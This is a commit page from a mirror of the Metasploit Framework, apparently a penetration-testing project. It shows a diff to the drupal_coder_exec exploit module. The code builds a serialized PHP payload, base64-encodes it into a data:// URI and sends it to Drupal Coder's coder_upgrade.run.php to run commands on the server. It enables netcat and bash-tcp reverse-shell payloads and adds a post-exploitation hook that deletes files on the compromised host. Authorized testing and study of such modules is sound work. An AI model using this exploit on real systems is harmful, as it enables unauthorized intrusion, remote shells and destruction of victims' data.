infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #7215, Fix drupal_coder_exec bugs #7215

bug/bundler_fix
William Webb 2016-08-18 13:43:23 -05:00
parent bc9a402d9e 4228868c29
commit 3eb3c5afa2
No known key found for this signature in database
GPG Key ID: 341763D0308DA650
1 changed files with 11 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/unix/webapp/drupal_coder_exec.rb
View File

@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Compat' => 'Compat' =>
{ {
'PayloadType' => 'cmd cmd_bash', 'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'netcat netcat-e bash-tcp' 'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
}, },
}, },
'Platform' => ['unix'], 'Platform' => ['unix'],
@ -87,15 +87,23 @@ class MetasploitModule < Msf::Exploit::Remote
p << payload.encoded p << payload.encoded
p << ' #";s:4:"name";s:4:"test";}}}' p << ' #";s:4:"name";s:4:"test";}}}'
payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}" pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
send_request_cgi( send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
'encode_params' => false, 'encode_params' => false,
'vars_get' => { 'vars_get' => {
'file' => payload 'file' => pl
} }
) )
end end
# XXX: FileDropper can't handle weird filenames
def on_new_session(session)
# This find command should be decently portable...
command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
print_status("Cleaning up: #{command}")
session.shell_command_token(command)
end
end end